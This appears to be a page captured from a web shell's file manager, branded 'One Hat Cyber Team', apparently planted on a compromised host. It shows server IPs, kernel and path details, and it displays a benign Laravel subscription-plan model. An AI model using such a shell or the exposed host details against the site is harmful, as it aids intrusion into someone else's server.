One Hat Cyber Team
Your IP :
3.16.143.199
Server IP :
162.241.123.123
Server :
Linux sh016.hostgator.in 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Server Software :
Apache
PHP Version :
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home1
/
saicsazq
/
keedoai.com
/
app
/
Models
/
View File Name :
SubscriptionPlan.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class SubscriptionPlan extends Model { use HasFactory; /** * The attributes that are mass assignable. * * @var array */ protected $fillable = [ 'paypal_gateway_plan_id', 'stripe_gateway_plan_id', 'paystack_gateway_plan_id', 'razorpay_gateway_plan_id', 'flutterwave_gateway_plan_id', 'paddle_gateway_plan_id', 'status', 'plan_name', 'price', 'currency', 'words', 'images', 'payment_frequency', 'primary_heading', 'featured', 'model', 'model_chat', 'plan_features', 'free', 'templates', 'image_feature', 'max_tokens', 'characters', 'minutes', 'voiceover_feature', 'transcribe_feature', 'code_feature', 'chat_feature', 'chats', 'image_storage_days', 'voiceover_storage_days', 'whisper_storage_days', 'team_members', 'personal_openai_api', 'personal_sd_api', 'days', 'dalle_image_engine', 'sd_image_engine', 'wizard_feature', 'vision_feature', 'internet_feature', 'chat_image_feature', 'chat_pdf_feature', 'chat_web_feature', 'chat_csv_feature', 'chat_csv_file_size', 'chat_pdf_file_size', 'rewriter_feature', 'smart_editor_feature', ]; /** * Plan can have many subscribers * */ public function subscriptions() { return $this->hasMany(Subscriber::class); } }